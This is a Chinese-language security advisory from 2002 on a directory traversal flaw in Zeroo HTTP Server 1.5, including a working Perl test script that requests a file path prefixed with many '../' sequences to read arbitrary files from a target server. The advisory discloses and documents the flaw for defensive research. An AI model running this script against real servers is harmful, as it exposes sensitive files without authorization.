安全研究

安全漏洞
Zeroo HTTP Server远程目录遍历漏洞

发布日期:2002-12-03
更新日期:2002-12-11

受影响系统:
Zeroo HTTP Server 1.5
描述:
BUGTRAQ  ID: 6308

Zeroo HTTP Server是一款简单快速的WEB服务器程序。

Zeroo HTTP对用户提交的恶意WEB请求缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限查看系统上任意文件内容。

由于Zeroo不正确过滤WEB请求,攻击者可以提交包含多个'../'的WEB请求给Zeroo服务程序,可绕过WEB ROOT目录的限制,以WEB权限查看系统上任意文件内容。造成敏感信息泄露。

<*来源:mattmurphy (mattmurphy@kc.rr.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103803494825054&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

mattmurphy (mattmurphy@kc.rr.com)提供了如下测试脚本:

#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;

建议:
厂商补丁:

Zeroo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://lonerunner.cfxweb.net/

浏览次数:2842
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障